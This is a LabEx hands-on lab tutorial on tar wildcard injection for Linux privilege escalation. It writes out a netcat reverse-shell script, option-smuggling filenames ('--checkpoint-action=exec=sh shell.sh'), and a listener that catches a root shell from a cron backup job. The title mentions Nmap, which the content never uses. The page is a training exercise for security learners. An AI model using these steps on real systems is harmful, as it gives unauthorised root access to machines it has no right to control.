LabEx
Log InJoin Free

Perform Wildcard Injection in Nmap for Privilege Escalation

Beginner

Introduction

In this lab, we will learn about wildcard injection, a technique used for privilege escalation on Linux systems. Specifically, we will explore the principle of wildcard injection in the widely-used tar command and perform a hands-on exercise to gain root privileges by leveraging this vulnerability in combination with the crontab utility.

Understanding Wildcards

First, let's understand what wildcards are and how they work in the Linux shell. Wildcards are special characters or character sequences that can be used to represent or match a set of filenames or paths.

Here are some common wildcards:

  • * (asterisk) matches any number of characters (including zero characters) in a filename or path.
  • ? (question mark) matches any single character.
  • [] (square brackets) match any single character within the specified set of characters enclosed in the brackets.
  • ~ (tilde) represents the home directory of the current user or another user if followed by a username.

In the context of privilege escalation, the * and - wildcards are commonly used. Let's first explore how the shell interprets the - character.

  1. Open a terminal and navigate to the /home/labex/project directory:

    cd /home/labex/project

  2. There is a file named --help in the current directory. Try to think about and experiment with how you can view the contents of this file.

    If you use the cat --help command, you'll get the help message for the cat command instead of viewing the contents of the --help file.

    Similarly, if you use vim --help, you'll see a help message for the vim command.

    This is because the Linux shell interprets - as a command argument.

  3. To view the contents of the --help file, you need to avoid starting the filename with -. You can use:

    cat /home/labex/project/--help

    This way, the shell won't interpret --help as an argument, and you'll be able to view the file's contents.

  4. Now, let's change the contents of the --help file with any editor of your choice. For example, you can use nano:

    nano /home/labex/project/--help

    Delete the existing content and add the following text to the file:

    I can read the file

    Save and exit nano.

This behavior of the shell is precisely what wildcard injection exploits.

Wildcard injection is often combined with cron jobs, so let's explore a real-world example involving the tar command.

Crontab Tar Wildcard Injection

To understand how wildcard injection can lead to privilege escalation, we'll perform a hands-on exercise involving the tar command and crontab.

  1. First, let's initialize the lab environment by running the following command:

    Navigate to the /home/labex/project directory:

    cd /home/labex/project

    Run the setup script to initialize the lab environment:

    ./env_setup.sh

    After initialization, you'll be switched to the user001 user (simulating an attacker who has gained initial shell access).

  2. Then, let's check the crontab for scheduled tasks:

    cat /etc/crontab

    Expected output:

    * * * * * root cd /var/www/html/ && tar -zcf /var/backups/html.tgz *

    You should see a task scheduled to run every minute, which archives the contents of the /var/www/html/ directory into a compressed file /var/backups/html.tgz.

  3. Next, let's take a look at the files inside the /var/www/html directory:

    ls /var/www/html

    To exploit the wildcard injection vulnerability, we need to create the following three files in the /var/www/html/ directory.

    First, navigate to the /var/www/html directory:

    cd /var/www/html/

    • shell.sh with the content to execute a reverse shell:

      echo 'nc.traditional 127.0.0.1 4444 -e /bin/bash' > shell.sh

    • A file named --checkpoint-action=exec=sh shell.sh (note the spaces in the filename):

      echo "" > "--checkpoint-action=exec=sh shell.sh"

    • A file named --checkpoint=1:

      echo "" > --checkpoint=1

    After creating these files, the /var/www/html/ directory should look like this:

    '--checkpoint-action=exec=sh shell.sh' '--checkpoint=1' index.html index.nginx-debian.html shell.sh

  4. When the cron job executes the following command:

    tar -zcf /var/backups/html.tgz /var/www/html/*

    It will be interpreted as:

    tar -zcf /var/backups/html.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh index.html index.nginx-debian.html

    Here's what the parameters mean:

    • --checkpoint and --checkpoint-action are typically used together. The former sets a checkpoint, and the latter specifies the action to be taken when the checkpoint is reached.
    • --checkpoint-action=exec=sh shell.sh means that when the checkpoint is reached, the shell.sh script will be executed.

    So, whenever the cron job runs, the shell.sh script will be executed, which will reverse-shell /bin/bash to the local port 4444.

  5. Let's set up a listener on the local port 4444 in the current shell:

    nc -lnvp 4444

    After a short wait, when the cron job is executed, we should receive the reverse shell with root privileges:

    Expected output:

    Listening on 0.0.0.0 4444
Connection received on 127.0.0.1 56226

    Try create a file success.txt in the /root directory to confirm that you have root privileges:

    touch /root/success.txt

    If you can create the file without any permission errors, you have successfully escalated your privileges using wildcard injection.

There are two important limitations to this tar + crontab privilege escalation technique:

  1. The html directory needs to have write (w) permission for "other" users, so we can create the shell.sh and other files in that directory.

  2. The tar command in the crontab should not include an absolute path. For example, if the crontab entry looks like this:

    * * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*

    The wildcard injection will fail because the shell will interpret the command as:

    tar -zcf /var/backups/html.tgz /var/www/html/--checkpoint=1 /var/www/html/--checkpoint-action=exec=sh shell.sh /var/www/html/shell.sh /var/www/html/index.html /var/www/html/index.nginx-debian.html

    In this case, /var/www/html/--checkpoint=1 and /var/www/html/--checkpoint-action=exec=sh shell.sh will not be interpreted as tar command arguments, and the injection will fail.

Summary

In this lab, we learned about wildcard injection, a technique used for privilege escalation on Linux systems. We explored the principle of wildcard injection in the widely-used tar command and performed a hands-on exercise to gain root privileges by leveraging this vulnerability in combination with the crontab utility. Through this lab, we gained practical experience in understanding and exploiting a real-world privilege escalation vulnerability, which is an essential skill for any security professional or system administrator.